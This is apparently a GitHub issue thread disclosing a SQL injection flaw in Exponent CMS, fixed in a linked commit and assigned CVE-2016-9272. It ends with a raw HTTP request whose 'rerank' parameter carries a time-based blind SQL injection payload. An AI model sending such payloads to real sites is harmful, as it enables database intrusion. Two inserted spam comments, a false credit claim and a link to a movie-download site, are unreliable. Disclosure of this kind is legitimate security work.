Closed exponentcms closed 4 years ago
Appears to be a duplicate of #1395
(from [fffb2038de4c603931b785a4c3ec69cfd06181ba]) fix sql injection security vulnerability; reported by Nicky [#1394 state:resolved] [#1395 state:resolved] https://github.com/exponentcms/exponent-cms/commit/fffb2038de4c603931b785a4c3ec69cfd06181ba
Hi Can you help me to apply for a CVEID this vulnerability?
Please visit http://cve.mitre.org/cve/request_id.html, I've not had much success since they've changed reporting methods from email submission to form submission.
Hi, I have successfully applied for a CVEID(CVE-2016-9272) for this SQL injection vulnerability.
Credit:Nicky of Tencent Security Platform Department
Thank you.
Hi, I've successfully applied for this SQL injection vulnerability. Credit goes to creators of showbox app. Here is the showbox homepage. Thanks!
Existing without the answers to the difficulties you’ve sorted out through this guide is a critical case, as well as the kind which could have badly affected my entire career if I had not discovered your website. Check also https://newestmovieshd.org/ios-no-jailbreak-download
POST /exponent/ HTTP/1.1 Content-Length: 268 Content-Type: application/x-www-form-urlencoded X-Requested-With: XMLHttpRequest Referer: http://192.168.118.1:80/exponent/ Cookie: PHPSESSID=4b42cc8b7f69ebe1afdcbf4abbfee00b; adminer_key=cdeaea5d52a8f402a28bd04980a7851b Host: 192.168.118.1 Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21 Accept: /
action=manage_ranks&controller=container&lastpage=http://192.168.118.1/exponent/untitled&model=container&rerank%5b%5d=if(now()%3dsysdate()%2csleep(0)%2c0)/*'XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR'%22XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR%22*/&src=%40section1